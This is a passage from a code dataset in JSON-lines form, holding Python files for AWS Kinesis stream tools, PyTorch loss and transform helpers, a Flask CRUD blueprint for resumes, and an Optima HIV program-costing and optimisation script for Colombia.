logger.setLevel('INFO')\n logger_init(logger)\n kmanager = KinesisManager()\n\n if args.action == _ACTION_LIST_STREAMS:\n kmanager.list_streams()\n elif args.action == _ACTION_PUT_RECORDS:\n kmanager.put_files(args.files, args.stream_name)\n elif args.action == _ACTION_PUT_DATA:\n try:\n normalized_data = json.loads(args.data)\n except json.JSONDecodeError as e:\n logger.error('Input data in wrong format!\\n'.format(e))\n sys.exit(1)\n kmanager.data_upload(args.stream_name, normalized_data, False)\n elif args.action == _ACTION_GET_RECORDS:\n kmanager.get_data(args.stream_name, args.shard_iterator_type, args.output)\n elif args.action == _ACTION_PRINT_DATA:\n for record in kmanager.data_feed(args.stream_name, args.shard_iterator_type, args.no_linger):\n logger.debug(f\"{record['shard_id']}, {record['sequence_number']}, {record['date_of_arrival']}\")\n print(record['data'])\n elif args.action == _ACTION_DUMP_DATA:\n for record in kmanager.data_feed(args.stream_name, args.shard_iterator_type, args.no_linger):\n json_repr = json.loads(record['data'])\n if 'OrderHeader' in json_repr.keys():\n payload_header = 'OrderHeader'\n record_date = 'OrderDate'\n elif 'ReturnHeaderUDM' in json_repr.keys():\n payload_header = 'ReturnHeaderUDM'\n record_date = 'ReturnDate'\n elif 'CouponHeader' in json_repr.keys():\n payload_header = 'CouponHeader'\n record_date = 'CreatedTimestamp'\n else:\n payload_header = 'EventInfo'\n record_date = 'SourceTimestamp'\n\n file_path = \"{output_folder}/{date}-{event_id}.json\".format(\n output_folder=args.output,\n date=json_repr.get(payload_header, {}).get(record_date, '1978-01-01 00:00:00+0000')[:10],\n event_id=json_repr.get('EventInfo', {}).get('EventID', '')\n )\n logger.info(f'Writing file {file_path}')\n with open(file_path, 'wb') as fd:\n fd.write(record['data'])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"utils/python/kinesis_tools.py","file_name":"kinesis_tools.py","file_ext":"py","file_size_in_byte":20463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"159694512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 17:44:31 2019\n\n@author: Daniel\n\"\"\"\n\nimport torchvision.transforms as transforms\nimport eval_helper\nimport custom_dataset_classes as cdc\nimport data_transforms as dt\n\n## in data_loader.py\n\n'''\nNote: empty transforms are placeholders (and they are required to be there)\n'''\n\ndef get_transforms(params):\n task = params.task\n if task == 'mtm_smooth' or task == 'mtm_geo' or task == 'mtm_arap' or task == 'mtm_weighted_arap':\n train_transformer = transforms.Compose([dt.BsplineDeformGridSample_64x64x64(sigma=params.bspline_deform_sigma,\n order=params.bspline_deform_order,\n deform_chance=params.bspline_deform_chance)])\n eval_transformer = transforms.Compose([])\n \n return train_transformer, eval_transformer\n\n## in data_loader.py\n\ndef get_full_ds(data_dir, label_dir, eval_transformer, params):\n task = params.task\n if task == 'mtm_smooth' or task == 'mtm_geo' or task == 'mtm_arap' or task == 'mtm_weighted_arap':\n full_ds = cdc.CT_just_load_gt_pcl_Dataset(data_dir, label_dir, eval_transformer)\n \n return full_ds\n\n## in main.py\n\ndef get_loss_fn(params, task):\n if task == 'mtm_smooth':\n loss_fn = eval_helper.ChamferSmoothnessGtPcl(lambdas=params.loss_lambdas)\n elif task == 'mtm_geo':\n loss_fn = eval_helper.ChamferGeoGtPcl(lambdas=params.loss_lambdas, edge_loss_which=params.edge_loss_which)\n elif task == 'mtm_arap':\n loss_fn = eval_helper.ChamferARAPGtPcl(params.arap_template_filename, lambdas=params.loss_lambdas)\n elif task == 'mtm_weighted_arap':\n loss_fn = eval_helper.ChamferWeightedARAPGtPcl(params.arap_template_filename1, params.arap_template_filename2,\n lambdas=params.loss_lambdas, softmax_base_exp=params.arap_softmax_base_exp,\n deform_gradient_method=params.deform_gradient_method, distortion_type=params.distortion_type)\n\n return loss_fn\n","sub_path":"things_to_modify_for_tasks.py","file_name":"things_to_modify_for_tasks.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"347922202","text":"import datetime\n\nfrom flask import Blueprint, request\n\nfrom data.database import db\nfrom domain.models.Curriculo import Curriculo\n\nbp = Blueprint('curriculos_controllers', __name__, url_prefix='/curriculos')\n\n\n@bp.route('/list', methods=['GET'])\ndef list_curriculos_candidato():\n try:\n return {'curriculos': [curriculo.to_dict() for curriculo in\n Curriculo.query.filter_by(id_candidato=request.args.get('id_candidato')).all()]}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/get', methods=['GET'])\ndef get_curriculo():\n try:\n return Curriculo.query.filter_by(id_curriculo=request.args.get('id_curriculo')).first().to_dict()\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/create', methods=['POST'])\ndef create_curriculo():\n try:\n curriculo_criar = Curriculo(**request.form)\n db.session.add(curriculo_criar)\n db.session.commit()\n return {'message': 'curriculo criado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/update', methods=['PUT'])\ndef update_curriculo():\n try:\n curriculo_atualizar = Curriculo.query.filter_by(id_curriculo=request.form.get('id_curriculo')).first()\n\n curriculo_atualizar.titulo = request.form.get('titulo')\n curriculo_atualizar.cargo = request.form.get('cargo')\n curriculo_atualizar.objetivo = request.form.get('objetivo')\n\n curriculo_atualizar.data_alteracao = datetime.datetime.now()\n db.session.commit()\n return {'message': 'curriculo atualizado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}\n\n\n@bp.route('/delete', methods=['DELETE'])\ndef delete_curriculo():\n try:\n curriculo_deletar = Curriculo.query.filter_by(id_curriculo=request.form.get('id_curriculo')).first()\n\n db.session.delete(curriculo_deletar)\n db.session.commit()\n return {'message': 'curriculo deletado com sucesso'}\n except Exception as exc:\n return {'error': str(exc)}","sub_path":"src/api/controllers/curriculos_controllers.py","file_name":"curriculos_controllers.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279622968","text":"\"\"\"\nCreate & analyse Colombia project\n\"\"\"\n\n## Define what to run\n\ntorun = [\n#'loadproject', # Load existing project - use as an alternative to running all components\n'makeproject', # PLACEHOLDER: get details from Azfar\n'makeprograms', # Create programs\n'addeffects', # Modify effects\n'scriptcalibration', # PLACEHOLDER: get details from Azfar\n#'manualcalibration', # PLACEHOLDER: get details from Azfar\n#'plotresults', # Plot results\n#'compareoutcomes', # Compare the parameters under calibration and cost functions\n#'budgetscens', # Run basic budget scenarios\n'90-90-90', # Run 90-90-90 scenario\n#'basicoptimize', # Run basic optimization\n#'exportdata' # Export data\n#'saveproject', # Save project\n]\n\n\n##############################################################################\n## Initialization\n##############################################################################\n\nfrom optima import Project, Program, Programset, Budgetscen, Parscen, dcp, pygui, findinds\n\nif 'doplot' not in locals(): doplot = True\n\n#userdir = '/Users/robynstuart/Google Drive/Optima/'\nuserdir = '/u/cliffk/drive/optima/'\ncountrydir = userdir + 'Optima applications/Colombia/2.0/'\nprojectdir = countrydir + 'Project files/'\nspreadsheetfile = countrydir + 'Data/Colombia 20160307.xlsx'\nprojectfile = projectdir + 'Colombia_20160324_CK.prj'\nnewprojectfile = projectdir + 'Colombia_20160327_CK.prj'\n\n\n##############################################################################\n## Analysis steps\n##############################################################################\n\n# Load existing project\nif 'loadproject' in torun:\n \n print(' Load project...')\n from optima import loadobj, Settings\n P = loadobj(projectfile)\n P.name = 'colombia-orig'\n P.settings = Settings() # Reset settings\n\n\n\n# Adjust viral suppressions\nif 'lowertreatvs' in torun:\n \n print(' Use slightly lower viral suppression pre-2015...')\n ps = P.parsets[0].pars[0]\n ps['treatvs'].t[:] = array([[ 2000., 2015.]])\n ps['treatvs'].y[:] = array([[0.5, 0.7]])\n\n\n# There's an optimisatin in the saved project, remove it if you want\nif 'deleteoptim' in torun:\n P.rmresult()\n\n\n# Create project\nif 'makeproject' in torun:\n print(' Making project...')\n P = Project(name='colombia-ck', spreadsheet=spreadsheetfile, dorun=False)\n \n\n\n# Add programs\nif 'makeprograms' in torun:\n\n pops = P.data['pops']['short']\n genpoplist = []\n genpoplist.append(pops[4])\n genpoplist.append(pops[5])\n homelesspoplist = []\n homelesspoplist.append(pops[6])\n homelesspoplist.append(pops[7])\n malelist = [pops[i] for i in range(len(pops)) if P.data['pops']['male'][i]]\n idulist = [pops[i] for i in range(len(pops)) if P.data['pops']['injects'][i]]\n pwidlist = idulist[0] \n fswlist = [pops[i] for i in range(len(pops)) if P.data['pops']['sexworker'][i] and P.data['pops']['female'][i]]\n\n regpships = P.parsets['default'].pars[0]['condreg'].y.keys()\n caspships = P.parsets['default'].pars[0]['condcas'].y.keys()\n compships = P.parsets['default'].pars[0]['condcom'].y.keys()\n\n\n # Extract casual partnerships that include at least one female sex worker\n fsw_caspships = []\n for fsw in fswlist:\n for caspship in caspships:\n if fsw in caspship:\n fsw_caspships.append(caspship)\n\n # Extract commercial partnerships that include at least one female sex worker\n fsw_compships = []\n for fsw in fswlist:\n for compship in compships:\n if fsw in compship:\n fsw_compships.append(compship)\n\n # Extract men who have sex with men\n msmlist = []\n for pship in regpships+caspships+compships:\n if pship[0] in malelist and pship[1] in malelist:\n msmlist.append(pship[0])\n msmlist = list(set(msmlist))\n\n # Extract casual partnerships that include at least one man who has sex with men\n msm_caspships = []\n for msm in msmlist:\n for caspship in caspships:\n if msm in caspship:\n msm_caspships.append(caspship)\n msm_caspships = list(set(msm_caspships))\n\n # Extract casual partnerships that include at least one person who injects drugs \n pwid_caspships = []\n for pwid in [pwidlist]:\n for caspship in caspships:\n if pwid in caspship:\n pwid_caspships.append(caspship)\n pwid_caspships = list(set(pwid_caspships))\n \n # Extract casual partnerships that include at least one homeless person \n homeless_caspships = []\n for homeless in homelesspoplist:\n for caspship in caspships:\n if homeless in caspship:\n homeless_caspships.append(caspship)\n homeless_caspships = list(set(homeless_caspships))\n\n # Extract casual partnerships that include at least one homeless person \n gp_caspships = []\n for gp in genpoplist:\n for caspship in caspships:\n if gp in caspship:\n gp_caspships.append(caspship)\n gp_caspships = list(set(gp_caspships))\n\n\n # Set up default programs\n Condoms_EPS = Program(short='Condoms (EPS)',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in caspships]+[{'param': 'condcom', 'pop': compship} for compship in compships],\n targetpops=pops,\n name='Condom promotion and distribution by EPS')\n \n SBCC = Program(short='SBCC',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in gp_caspships],\n targetpops=genpoplist,\n name='Social and behavior change communication')\n \n \n FSW_programs = Program(short='FSW programs',\n targetpars=[{'param': 'condcom', 'pop': compship} for compship in fsw_compships] + [{'param': 'condcas', 'pop': caspship} for caspship in fsw_caspships] + [{'param': 'hivtest', 'pop': pop} for pop in fswlist],\n targetpops=fswlist,\n name='Programs for female sex workers and clients')\n \n MSM_programs = Program(short='MSM programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in [('Females 15-49', 'MSM'), ('Transgender', 'MSM'), ('MSM', 'MSM')]] + [{'param': 'hivtest', 'pop': 'MSM'}],\n targetpops=['MSM'],\n name='Programs for men who have sex with men')\n \n Transgender_programs = Program(short='Transgender programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in [('Transgender', 'MSM'), ('Transgender', 'Transgender')]] + [{'param': 'hivtest', 'pop': 'Transgender'}],\n targetpops=['Transgender'],\n name='Programs for transgender individuals')\n \n Homeless_programs = Program(short='Homeless programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in homeless_caspships] + [{'param': 'hivtest', 'pop': pop} for pop in homelesspoplist],\n targetpops=homelesspoplist,\n name='Programs for homeless people')\n \n PWID_programs = Program(short='PWID programs',\n targetpars=[{'param': 'condcas', 'pop': caspship} for caspship in pwid_caspships] + [{'param': 'hivtest', 'pop': 'PWID'}]+[{'param': 'condcom', 'pop': ('PWID', 'FSW')}],\n targetpops=['PWID'],\n name='Programs for people who inject drugs')\n \n NSP = Program(short='NSP',\n targetpars=[{'param': 'sharing', 'pop': pop} for pop in idulist],\n targetpops=idulist,\n name='Needle-syringe programs')\n \n HTC_EPS = Program(short='HTC (EPS)',\n targetpars=[{'param': 'hivtest', 'pop': pop} for pop in pops],\n targetpops=pops,\n name='HIV testing and counseling')\n \n ART = Program(short='ART',\n targetpars=[{'param': 'numtx', 'pop': 'tot'}],# for pop in pops],\n targetpops=pops,\n name='Antiretroviral therapy')\n \n PMTCT_treatment = Program(short='PMTCT (treatment)',\n targetpars=[{'param': 'numpmtct', 'pop': 'tot'},{'param': 'numtx', 'pop': 'tot'}],\n targetpops=pops,\n name='Prevention of mother-to-child transmission, treatment',\n criteria = {'hivstatus': 'allstates', 'pregnant': True})\n \n PMTCT_testing = Program(short='PMTCT (testing)',\n targetpars=[{'param': 'hivtest', 'pop': pop} for pop in ['FSW','Females 15-49','Homeless Females']],\n targetpops=['FSW','Females 15-49','Homeless Females'],\n name='Prevention of mother-to-child transmission, testing',\n criteria = {'hivstatus': 'allstates', 'pregnant': True})\n \n MGMT = Program(short='MGMT',\n category='Management and administration',\n name='Management')\n \n HR = Program(short='HR',\n category='Management and administration',\n name='HR and training')\n \n ENV = Program(short='ENV',\n category='Management and administration',\n name='Enabling environment')\n \n ME = Program(short='ME',\n category='Other',\n name='Monitoring, evaluation, surveillance, and research')\n\n\n #Add cost functions\n Condoms_EPS.costcovfn.addccopar({'saturation':(0.6,0.8),'t': 2016.0, 'unitcost':(.5,.6)}) #Condoms (EPS)\n \n SBCC.costcovfn.addccopar({'saturation': (0.75,0.85),\n 't': 2016.0,\n 'unitcost': (0.04,0.06)}) #SBCC\n \n FSW_programs.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (90,100)}) #FSW programs\n \n MSM_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (33,50)}) #MSM programs\n \n PWID_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (40,65)}) #PWID programs\n \n NSP.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (1,3)}) #NSP\n\n HTC_EPS.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (11,12)}) #HTC (EPS)\n \n ART.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (515,664)}) #ART\n \n PMTCT_treatment.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (450,500)}) #PMTCT (treatment)\n\n Homeless_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (40,65)}) #Homeless programs\n \n Transgender_programs.costcovfn.addccopar({'saturation': (0.85,0.95),\n 't': 2016.0,\n 'unitcost': (25,40)}) #Transgender programs\n \n PMTCT_testing.costcovfn.addccopar({'saturation': (1.0,1.0),\n 't': 2016.0,\n 'unitcost': (11,12)}) #PMTCT (testing)\n \n #add cost-coverage data\n #variable costs\n Condoms_EPS.addcostcovdatum({'t':2012,'cost':158128.0,'coverage':28735.0})\n SBCC.addcostcovdatum({'t':2013,'cost':794546.0,'coverage':16402290.0}) \n FSW_programs.addcostcovdatum({'t':2013,'cost':3837510.96,'coverage':24124.78})\n MSM_programs.addcostcovdatum({'t':2013,'cost':7160644.32,'coverage':160914.39})\n PWID_programs.addcostcovdatum({'t':2013,'cost':0.0,'coverage':0.0})\n NSP.addcostcovdatum({'t':2013,'cost':1873.0,'coverage':1650.0}) \n HTC_EPS.addcostcovdatum({'t':2012,'cost':6074473.0,'coverage':463897.0})\n ART.addcostcovdatum({'t':2014,'cost':34680116.0,'coverage':59622.0})\n PMTCT_treatment.addcostcovdatum({'t':2013,'cost':329137.0,'coverage':691.0}) \n Homeless_programs.addcostcovdatum({'t':2013,'cost':1024840.41,'coverage':19582.80})\n Transgender_programs.addcostcovdatum({'t':2013,'cost':1037310.01,'coverage':22134.61})\n PMTCT_testing.addcostcovdatum({'t':2012,'cost':3771200.0,'coverage':288000.0})\n \n #fixed costs - MGMT, HR, ENV, ME\n MGMT.addcostcovdatum({'t':2013,'cost':298415.23,'coverage':None})\n HR.addcostcovdatum({'t':2013,'cost':446117.96,'coverage':None})\n ENV.addcostcovdatum({'t':2013,'cost':132030.15,'coverage':None})\n ME.addcostcovdatum({'t':2013,'cost':13604.74,'coverage':None})\n\n\n allprograms = [Condoms_EPS, SBCC, FSW_programs, MSM_programs, Transgender_programs, Homeless_programs, PWID_programs, NSP, HTC_EPS, ART, PMTCT_treatment, PMTCT_testing, MGMT, HR, ENV, ME]\n R = Programset(programs=allprograms)\n P.addprogset(name='default', progset = R)\n\n\n\n# Add programs\nif 'addeffects' in torun: \n\n R = P.progsets[0]\n\n #needle sharing parameters \n R.covout['sharing']['Homeless Females'].addccopar({'NSP': (0.01, 0.02),'intercept': (0.15, 0.15), 't': 2015.0})\n R.covout['sharing']['PWID'].addccopar({'NSP': (0.01, 0.02), 'intercept': (0.32, 0.32), 't': 2015.0})\n R.covout['sharing']['Homeless Males'].addccopar({'NSP': (0.01, 0.02), 'intercept': (0.15, 0.15), 't': 2015.0})\n \n #commercial condom use parameters\n R.covout['condcom'][('Males 15-49', 'FSW')].addccopar({'intercept': (0.6, 0.6), 'FSW programs': (0.99, 0.99), 'Condoms (EPS)':(.99,.99), 't': 2015.0})\n R.covout['condcom'][('PWID', 'FSW')].addccopar({'intercept': (0.6, 0.6), 't': 2015.0, 'FSW programs': (0.99, 0.99), 'Condoms (EPS)':(.99,.99), 'PWID programs':(.99,.99)})\n \n #number of people on ART\n R.covout['numtx']['tot'].addccopar({'intercept': (0.0, 0.0), 'ART': [], 'PMTCT (treatment)': [], 't': 2015.0})\n \n #number of women on PMTCT\n R.covout['numpmtct']['tot'].addccopar({'intercept': (0.0, 0.0), 't': 2015.0, 'PMTCT (treatment)': []})\n \n #casual condom use parameters\n R.covout['condcas'][('MSM', 'MSM')].addccopar({'MSM programs': (0.99, 0.99), 'Condoms (EPS)': (0.99, 0.99), 'intercept': (0.3, 0.35), 't': 2015.0})\n R.covout['condcas'][('Transgender', 'MSM')].addccopar({'MSM programs': (0.65, 0.75), 'Condoms (EPS)': (0.8, 0.8), 'intercept': (0.1, 0.1), 'Transgender programs': (0.7, 0.7), 't': 2015.0})\n R.covout['condcas'][('Transgender', 'Transgender')].addccopar({'Transgender programs': (0.9, 0.9), 'Condoms (EPS)': (0.8, 0.8), 'intercept': (0.1, 0.1), 't': 2015.0})\n R.covout['condcas'][('PWID', 'FSW')].addccopar({'Condoms (EPS)': (0.7, 0.7), 'PWID programs': (0.5, 0.6), 'intercept': (0.01, 0.02), 't': 2015.0, 'FSW programs': (0.5, 0.6)})\n R.covout['condcas'][('Males 15-49', 'FSW')].addccopar({'Condoms (EPS)': (0.45, 0.5), 'SBCC': (0.2, 0.3), 'intercept': (0.1, 0.2), 't': 2015.0, 'FSW programs': (0.5, 0.6)})\n R.covout['condcas'][('Females 15-49', 'MSM')].addccopar({'MSM programs': (0.9, 0.99), 'Condoms (EPS)': (0.75, 0.8), 'intercept': (0.1, 0.2), 't': 2015.0, 'SBCC': (0.2, 0.3)})\n R.covout['condcas'][('Females 15-49', 'PWID')].addccopar({'Condoms (EPS)': (0.99, 0.99), 'PWID programs': (0.99, 0.99), 'intercept': (0.2, 0.4), 't': 2015.0, 'SBCC': (0.4, 0.5)})\n R.covout['condcas'][('Females 15-49', 'Males 15-49')].addccopar({'Condoms (EPS)': (0.7, 0.9), 'intercept': (0.1, 0.2), 't': 2015.0, 'SBCC': (0.5, 0.55)})\n R.covout['condcas'][('Homeless Females', 'Homeless Males')].addccopar({'Condoms (EPS)': (0.99, 0.99), 'intercept': (0.57, 0.6), 'Homeless programs': (0.99, 0.99), 't': 2015.0})\n \n #HIV testing parameters\n R.covout['hivtest']['FSW'].addccopar({'HTC (EPS)': (0.5,0.5), 'intercept': (0.001, 0.1), 'PMTCT (testing)': (0.8,0.8),'t': 2015.0, 'FSW programs': (0.45,0.47)})\n R.covout['hivtest']['MSM'].addccopar({'MSM programs': (0.5,0.5), 'HTC (EPS)': (0.5,0.5), 'intercept': (0.01, 0.05), 't': 2015.0})\n R.covout['hivtest']['Transgender'].addccopar({'Transgender programs': (0.4,0.43), 'HTC (EPS)': (0.4,0.4), 'intercept': (0.01, 0.05), 't': 2015.0})\n R.covout['hivtest']['Homeless Males'].addccopar({'HTC (EPS)': (0.99,0.99), 'intercept': (0.01, 0.1), 'Homeless programs': (0.99,0.99),'t': 2015.0})\n R.covout['hivtest']['Homeless Females'].addccopar({'HTC (EPS)': (0.99,0.99), 'intercept': (0.01, 0.1), 'Homeless programs': (0.99,0.99), 'PMTCT (testing)': (0.99,0.99),'t': 2015.0})\n R.covout['hivtest']['PWID'].addccopar({'HTC (EPS)': (0.9,0.9), 'PWID programs': (0.9,0.9), 'intercept': (0.01, 0.1), 't': 2015.0})\n R.covout['hivtest']['Males 15-49'].addccopar({'HTC (EPS)': (0.3,0.5), 'intercept': (0.001, 0.05), 't': 2015.0})\n R.covout['hivtest']['Females 15-49'].addccopar({'HTC (EPS)': (0.3,0.5), 'intercept': (0.001, 0.05), 'PMTCT (testing)': (0.9,0.99),'t': 2015.0})\n\n P.addprogset(name='default', progset = R)\n\n\n\n\n\n# Do calibration \nif 'scriptcalibration' in torun:\n print(' Calibrating project...')\n from numpy import array\n pars = P.parsets[0].pars[0]\n \n # Reduce testing rates, change force of infection, etc.\n pars['hivtest'].m = 0.5\n pars['aidstest'].m = 0.1\n # ['FSW', 'MSM', 'Transgender', 'PWID', 'Males 15-49', 'Females 15-49', 'Homeless Males', 'Homeless Females']\n pars['initprev'].y[:] = array([ 0.0075, 0.15 , 0.17 , 0.03 , 0.0012, 0.001 , 0.1 , 0.1 ])\n pars['force'].y[:] = array([ 16. , 0.21 , 0.165, 0.21 , 1.1 , 0.375, 4.4 , 1. ])\n\n\n\n# Plot results\nif 'plotresults' in torun:\n P.runsim()\n pygui(P.results[-1])\n\n\n# Plot results\nif 'manualcalibration' in torun:\n P.manualfit()\n\n\n\n\n\n## Compare outcoes under budget and calibration\nif 'compareoutcomes' in torun:\n comparison = P.progsets[0].compareoutcomes(parset=P.parsets[0], year=2016, doprint=True)\n\n\n\nif 'budgetscens' in torun:\n## Run sanity check budget scenarios\n \n ## Define scenarios\n defaultbudget = P.progsets['default'].getdefaultbudget()\n KPbudget = dcp(defaultbudget)\n KPbudget['FSW programs'] = 0.0\n KPbudget['MSM programs'] = 0.0\n KPbudget['Transgender programs'] = 0.0\n KPbudget['Homeless programs'] = 0.0\n\n scenlist = [\n Parscen(name='Current conditions', parsetname='default', pars=[]),\n Budgetscen(name='Zero KP budget', parsetname='default', progsetname='default', t=[2016], budget=KPbudget),\n ]\n \n Budgetscen(name='Current budget', parsetname='default', progsetname='default', t=[2016], budget=defaultbudget),\n \n #zerobudget = dcp(defaultbudget)\n #for key in zerobudget: zerobudget[key] = array([0.]) \n #doublebudget = dcp(defaultbudget) \n #for key in doublebudget: doublebudget[key] = array([doublebudget[key]*2])\n #infbudget = dcp(defaultbudget) \n #for key in infbudget: infbudget[key] = array([infbudget[key]+1e14])\n\n #scenlist = [\n # Parscen(name='Current conditions', parsetname='default', pars=[]),\n # Budgetscen(name='Current budget', parsetname='default', progsetname='default', t=[2016], budget=defaultbudget),\n # Budgetscen(name='Zero budget', parsetname='default', progsetname='default', t=[2016], budget=zerobudget),\n # Budgetscen(name='Double budget', parsetname='default', progsetname='default', t=[2016], budget=doublebudget),\n # Budgetscen(name='Infinite budget', parsetname='default', progsetname='default', t=[2016], budget=infbudget),\n # ]\n \n # Run the scenarios\n P.addscenlist(scenlist)\n P.runscenarios() \n \n pygui(P.results[-1], toplot=['prev-tot', 'prev-per', 'numinci-tot', 'numdeath-tot'])\n pygui(P.results[-1], toplot=['prev-tot'])\n\n\n\n\nif '90-90-90' in torun:\n## Run sanity check budget scenarios\n \n ## Define scenarios\n P.copyparset('default','90-90-90')\n from numpy import nan, append\n\n curryear = 2016\n years = [0., curryear, 2020]\n pars = P.parsets['90-90-90'].pars[0]\n P.runsim('default') # Temporary, to get baseline\n res = P.parsets['default'].getresults()\n curryearind = findinds(res.tvec, curryear)\n currplhiv = res.main['numplhiv'].tot[0][curryearind]\n currdx = res.main['numdiag'].tot[0][curryearind]\n currtx = res.main['numtreat'].tot[0][curryearind]\n currdx = currdx/currplhiv\n currtx = currtx/currplhiv\n pars['propdx'].t['tot'] = years\n pars['proptx'].t['tot'] = years\n pars['propdx'].y['tot'] = [nan, currdx, 0.9]\n pars['proptx'].y['tot'] = [nan, currtx, 0.81]\n currvs = pars['treatvs'].interp(pars['treatvs'].t['tot'])\n pars['treatvs'].t['tot'] = append(pars['treatvs'].t['tot'], curryear)\n pars['treatvs'].y['tot'] = append(pars['treatvs'].y['tot'], 0.9)\n P.runsim('90-90-90') # Just make sure it works\n \n scenlist = [\n Parscen(name='Current conditions', parsetname='default', pars=[]),\n Parscen(name='90-90-90', parsetname='90-90-90', pars=[])]\n \n # Run the scenarios\n P.addscenlist(scenlist)\n P.runscenarios() \n \n pygui(P.results[-1], toplot=['prev-tot', 'prev-per', 'numinci-tot', 'numdeath-tot'])\n pygui(P.results[-1], toplot=['prev-tot'])\n\n\nif 'basicoptimize' in torun:\n\n print('Basic optimization for Colombia...')\n from optima import defaultobjectives, defaultconstraints\n \n objectives = defaultobjectives(P.progsets[0]) \n constraints = defaultconstraints(P)\n \n userobynconstraints = 0\n useazfarconstraints = 1\n \n if userobynconstraints:\n constraints['min']['PMTCT (treatment)']=1.0\n constraints['max']['PMTCT (treatment)']=1.0\n constraints['min']['PMTCT (testing)']=1.0\n constraints['max']['PMTCT (testing)']=1.0\n constraints['max']['ART']=1.4\n\n elif useazfarconstraints:\n constraints['min']['Condoms (EPS)'] = 0.0\n constraints['min']['SBCC'] = 0.0\n constraints['min']['FSW programs'] = 0.0\n constraints['min']['MSM programs'] = 0.0\n constraints['min']['Transgender programs'] = 0.0\n constraints['min']['Homeless programs'] = 0.0\n constraints['min']['PWID programs'] = 0.0\n constraints['min']['NSP'] = 0.0\n constraints['min']['HTC (EPS)'] = 0.0\n constraints['min']['ART'] = 1.2\n constraints['min']['PMTCT (treatment)'] = 1.0\n constraints['min']['PMTCT (testing)'] = 1.0\n constraints['min']['MGMT'] = 1.0\n constraints['min']['HR'] = 1.0\n constraints['min']['ENV'] = 1.0\n constraints['min']['ME'] = 1.0\n \n constraints['max']['Condoms (EPS)'] = None\n constraints['max']['SBCC'] = None\n constraints['max']['FSW programs'] = None\n constraints['max']['MSM programs'] = None\n constraints['max']['Transgender programs'] = None\n constraints['max']['Homeless programs'] = None\n constraints['max']['PWID programs'] = None\n constraints['max']['NSP'] = None\n constraints['max']['HTC (EPS)'] = None\n constraints['max']['ART'] = 1.2\n constraints['max']['PMTCT (treatment)'] = 1.0\n constraints['max']['PMTCT (testing)'] = 1.0\n constraints['max']['MGMT'] = 1.0\n constraints['max']['HR'] = 1.0\n constraints['max']['ENV'] = 1.0\n constraints['max']['ME'] = 1.0\n\n\n P.optimize(name='minoutcome', parsetname='default', progsetname='default', objectives=objectives, constraints=constraints, method='asd', maxtime=1000)\n \n print('Original allocation: '),\n print(P.results[-1].budget[0])\n print('Optimal allocation: '),\n print(P.optims[-1].getresults().budget[1]) # Showing that results are \"stored\" in the optimization -- same object as before\n\n if doplot: \n from optima import pygui\n pygui(P.results[-1], toplot=['budget', 'improvement', 'prev-tot', 'prev-per', 'numinci-tot'])\n \nif 'exportdata' in torun:\n from optima import *\n from pandas import DataFrame, Series, ExcelWriter\n\n R = P.results[2] #select result to export, can edit to use result name instead\n \n ###############################################################################################################\n #Copy Incidence Estimates to file:\n df = DataFrame({'Current allocation': R.main['numinci'].tot['Current allocation'],\n 'Optimal allocation': R.main['numinci'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Incidence-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Incidence-Overall')\n writer.save()\n del df\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numinci'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numinci'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Incidence '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Incidence-'+R.popkeys[x])\n writer.save()\n del df\n \n ############################################################################################################## \n #Copy New Diagnosis Estimates to file:\n df = DataFrame({'Current allocation': R.main['numnewdiag'].tot['Current allocation'], \n 'Optimal allocation': R.main['numnewdiag'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('New diagnosis-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='New diagnosis-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numnewdiag'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numnewdiag'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('New Diagnosis '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='New Diagnosis-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Deaths Estimates to file:\n df = DataFrame({'Current allocation': R.main['numdeath'].tot['Current allocation'], \n 'Optimal allocation': R.main['numdeath'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Deaths-Overall.xlsx', engine = 'xlsxwriter')\n 